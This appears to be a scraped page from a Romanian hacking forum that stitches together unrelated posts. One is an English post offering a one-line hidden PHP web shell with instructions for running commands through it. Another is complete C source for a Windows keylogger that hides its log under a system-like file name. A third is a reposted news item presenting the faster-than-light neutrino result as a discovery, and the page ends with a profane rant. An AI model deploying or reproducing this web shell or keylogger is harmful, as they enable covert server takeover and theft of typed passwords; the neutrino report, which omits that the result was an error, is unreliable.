Leaderboard

Have you ever needed a small shell written in PHP? Of course you have. But I bet it haven't been all too stealth! This is really pointless, but someone might be interested in it. So here you go folks! <?=($_=@$_GET[2]).@$_($_GET[1])?> it doesn't look like much so let me explain. PHP allows strings to be interpreted as function calls. That's a major part on how callbacks in PHP work. Example: <? $array = array(1,2,3); array_walk($array, 'f'); function f($x){echo $x * 2;} ?> What the following example does, is that array_walk() iterates through the array $array and applies the function f() on each and every element in the list. The function f() prints out the value from the array and multiplies it by two. The output results in: 246. The fun thing is, if you look on how the callback f() is applied - it's by a simple string. (Look at argument #2 in the first function; array_walk()). What does that mean? Well, to put it short, you're able to take a string - and execute it as a function name. Now, let's try something... fuzzier... <? $fuzz = 'phpinfo'; $fuzz(); ?> What might this do? Will it execute? Damn right. Now let's tear my tiny code apart. It's made out of two parts. $_=@$_GET[2] @$_($_GET[1]) The first part takes the value from the GET-variable 2 and stores it in the temporary variable $_. The second part takes our temporary variable $_, and executes it with the GET-variable 1 as it's one-and-only argument. The @'s are only there for suppressing notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them. Conclusion: Copy and paste the snippet, and store it in a PHP-file. Execute a shell by going to: copypaste.php?1=shell_exec&2=whoami The response should be something like: apache ...or as on Windows if you're running your server as a service: nt authority/system. Conclusion; PHP is fun!

Un grup de cercet?tori europeni a produs un ?oc în lumea fizicii, dup? ce au anun?at c? au înregistrat particule subatomice de tip neutrino deplasându-se cu o vitez? mai mare decât cea a luminii. Enun?at? de Albert Einstein în 1905, viteza luminii constituie viteza maxim? pe care o poate avea o particul?, fiind una dintre legile fundamentale ale universului. Infirmarea acestei legi ar schimba radical fizica ?i ar face posibil? c?l?toria în timp. În cadrul unui experiment efectuat la acceleratorul de particule al CERN, 15.000 de particule neutrino au fost lansate din apropiere de Geneva spre o pe?ter? subteran? aflat? în Italia, la Gran Sasso, la aproximativ 730 de kilometri dep?rtare. Conform cercet?torilor, particulele au ajuns la destina?ie cu 60 de nanosecunde (0,00000006 secunde) mai repede decât i-ar fi luat luminii s? parcurg? aceea?i distan??, dep??ind bariera vitezei luminii cu 0,0025%. Cercet?torii care au efectuat studiul, apar?inând proiectului Oscillation Project with Emulsion-Tracking Apparatus, sus?in c? au verificat rezultatele în mod repetat, rezultatul fiind acela?i. "Am verificat ?i reverificat toate aspectele studiului ?i nu am g?sit nimic în neregul?. Acum a?tept?m ca rezultatele noastre s? fie confirmate independent", au afirmat ace?tia. Fizicienii din întreaga lume au r?mas ?oca?i la aflarea acestor rezultate, care, odat? confirmate, ar face posibil? c?l?toria în timp. Acest lucru a fost recunoscut în timpul vie?ii chiar de c?tre Albert Einstein, autorul teoriei relativit??ii, acesta declarând c? "dac? ar fi posibil s? transmitem un mesaj mai repede decât lumina, ai putea s? trimi?i o telegram? în trecut". Un cercet?tor de la CERN, Alvaro de Rujula, a comentat rezultatele: "Dac? acest studiu se confirm?, atunci înseamn? c? nu am în?eles nimic despre nimic. Acest rezultat pare de necrezut". John Ellis, un alt fizician de la CERN, a ad?ugat: "Înainte s?-l arunc?m pe Einstein pe rug, ar trebui efectuat un experiment independent". Antonio Ereditato, unul dintre fizicienii care au luat parte la acest studiu, a m?rturisit c? a avut aceea?i reac?ie de ?oc atunci când a v?zut rezultatele. "Dup? ce am discutat rezultatele timp îndelungat al?turi de colegii mei, am hot?rât s? le public?m, pentru ca acestea s? fie verificate de al?i cercet?tori. Visul meu este ca alt experiment s? descopere acela?i lucru, atunci m-a? lini?ti", a declarat acesta. Un astronom de la Universitatea din Hawaii, John Learned, sus?ine c? acest studiu ar putea fi primul indiciu asupra existen?ei unor alte dimensiuni, folosite de particulele neutrino ca "scurt?tur?". Majoritatea fizicienilor, îns?, sus?in c? este vorba aproape sigur despre o gre?eal? de m?sur?toare. Alan Kostelecky, teoretician la Universitatea din Indiana, a comentat: "o veche zical? a fizicii spune c? «afirma?iile extraordinare necesit? dovezi extraordinare»". Acesta a fost completat de un alt fizician, Chang Kee Jung de la Universitatea Stony Brook din New York: " Pot s? pun pariu c? este vorba despre o gre?eal? sistematic? a studiului. Nu a? pune ca miz? so?ia sau copiii mei, pentru c? probabil s-ar sup?ra, dar mi-a? paria casa c? despre asta este vorba ". Doar dou? laboratoare din întreaga lume pot încerca s? reproduc? rezultatele - Fermilab, situat în apropiere de Chicago, ?i un alt laborator aflat în Japonia afectat de tsunami-ul ?i cutremurul din martie. Cercet?torii de la Fermilab au început deja preg?tirile pentru un experiment similar. Rob Plunkett, cercet?tor la Fermilab, nu crede c? rezultatele vor fi acelea?i: "Este periculos s? pariezi împotriva lui Einstein. Teoriile sale au fost testate în mod repetat ?i confirmate mereu". Surse: Reuters, NYT, Science, AP Sursa RO: http://www.descopera.ro/dnews/8790219-socul-anului-a-fost-doborata-bariera-vitezei-luminii Parere personala: e interesant faptul ca aceasta noua descopearire ne arata ca inca avem enorm de mult de cercetat..

Salutare, Acum ceva timp in urma postase Slick un keylogger care "agata" un hook de tastatura si de fiecare data cand apasai o tasta iti semnala acest lucru printr-o pereche de paranteze afisate in consola. Am modificat proiectul lui a.i. consola nu mai este afisata, iar tastele apasate sunt inregistrate intr-un fisier. Initial planuisem sa bag programul in registrii sa porneasca automat la startup, iar log-ul sa fie de asemenea urcat automat pe server 1 data /zi. Din pacate, timpul si problemele de acasa m-au facut sa renunt la proiect si il postez aici, in speranta ca cineva il va continua, sau va invata ceva folositor: #include <windows.h> #include <winuser.h> #include <stdio.h> #include <string.h> HHOOK hKeyHook; // hook`ul bool shift = false; bool caps = false; FILE *f; // Acesta functia este exportata din executabil la fel ca o functie care face parte dintr-in dll __declspec(dllexport) LRESULT CALLBACK KeyEvent(int nCode,WPARAM wParam,LPARAM lParam) { if((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN))) { KBDLLHOOKSTRUCT hooked=*((KBDLLHOOKSTRUCT*)lParam); // diverse informatii despre tasta apasata DWORD dwMsg=1; if(hooked.vkCode == VK_SHIFT && shift == false) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[SHIFT]"); fclose(f); shift = true; } else if(hooked.vkCode == VK_SHIFT && shift == true) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[SHIFT]"); fclose(f); shift = false; } else if(hooked.vkCode == VK_CAPITAL && caps == true) caps = false; else if(hooked.vkCode == VK_CAPITAL && caps == false) caps = true; else if((0x41 <= hooked.vkCode && hooked.vkCode <= 0x5A) && (caps || shift)) { f = fopen("svchostw.dat", "a"); fprintf(f, "%c", hooked.vkCode); fclose(f); } else if((0x41 <= hooked.vkCode && hooked.vkCode <= 0x5A) && (caps==false && shift == false)) { f = fopen("svchostw.dat", "a"); fprintf(f, "%c", tolower(hooked.vkCode)); fclose(f); } else if(VK_NUMPAD0 <= hooked.vkCode && hooked.vkCode <= VK_NUMPAD9) { f = fopen("svchostw.dat", "a"); fprintf(f, "%d", hooked.vkCode - 0x60); fclose(f); } else if(0x30 <= hooked.vkCode && hooked.vkCode <= 0x39) { f = fopen("svchostw.dat", "a"); fprintf(f, "%d", hooked.vkCode - 0x30); fclose(f); } else if(hooked.vkCode == VK_OEM_1) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[;:]"); fclose(f); } else if(hooked.vkCode == VK_OEM_2) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[/?]"); fclose(f); } else if(hooked.vkCode == VK_OEM_3) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[`~]"); fclose(f); } else if(hooked.vkCode == VK_OEM_4) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[ [{ ]"); fclose(f); } else if(hooked.vkCode == VK_OEM_5) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[\\|]"); fclose(f); } else if(hooked.vkCode == VK_OEM_6) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[ ]} ]"); fclose(f); } else if(hooked.vkCode == VK_OEM_7) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "['\"]"); fclose(f); } else if(hooked.vkCode == VK_OEM_PLUS) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "+"); fclose(f); } else if(hooked.vkCode == VK_OEM_COMMA) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", ","); fclose(f); } else if(hooked.vkCode == VK_OEM_MINUS) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "-"); fclose(f); } else if(hooked.vkCode == VK_OEM_PERIOD) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "."); fclose(f); } else if(hooked.vkCode == VK_RETURN) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "\n"); fclose(f); } else if(hooked.vkCode == VK_TAB) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[TAB]"); fclose(f); } else if(hooked.vkCode == VK_DELETE) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[DEL]"); fclose(f); } else if(hooked.vkCode == VK_BACK) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", "[BACK]"); fclose(f); } else if(hooked.vkCode == VK_SPACE) { f = fopen("svchostw.dat", "a"); fprintf(f, "%s", " "); fclose(f); } } return CallNextHookEx(hKeyHook,nCode,wParam,lParam); } // un ciclu de mesaje folosit ca sa blocheze executia cat timp sunt logate tastele void MsgLoop() { MSG message; while(GetMessage(&message,NULL,0,0)) { TranslateMessage(&message); DispatchMessage(&message); } } // instaleaza hook`ul si incepe ciclul pentru capturarea tastelor apasate DWORD WINAPI KeyLogger(LPVOID lpParameter) { HINSTANCE hExe=GetModuleHandle(NULL); if (!hExe) hExe=LoadLibrary((LPCWSTR) lpParameter); if (!hExe) return 1; // eroare, iesim din program hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL,(HOOKPROC) KeyEvent,hExe,0); // instalam hook`ul MsgLoop(); // asteptam apasarea tastelor UnhookWindowsHookEx(hKeyHook); // dezinstalam hook`ul return 0; } int main(int argc, char** argv) { HANDLE hThread; DWORD dwThread; DWORD exThread; hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)KeyLogger, (LPVOID) argv[0], 0, &dwThread); // incepem functia de logging intr-un alt thread if(hThread) { return WaitForSingleObject(hThread,INFINITE); } else { return 1; } } link to pastebin: [C] KLg - Pastebin.com Toate cele bune

O SA CADA IN CAPU VOSTRU...terminati in pula mea cu topicurile astea de cancan... Ba da deschideti thread pt fiecare cacat !??????????????????? Ce pula mea urmeaza.. Thread pt cat timp pierzi zilnic la toaleta ?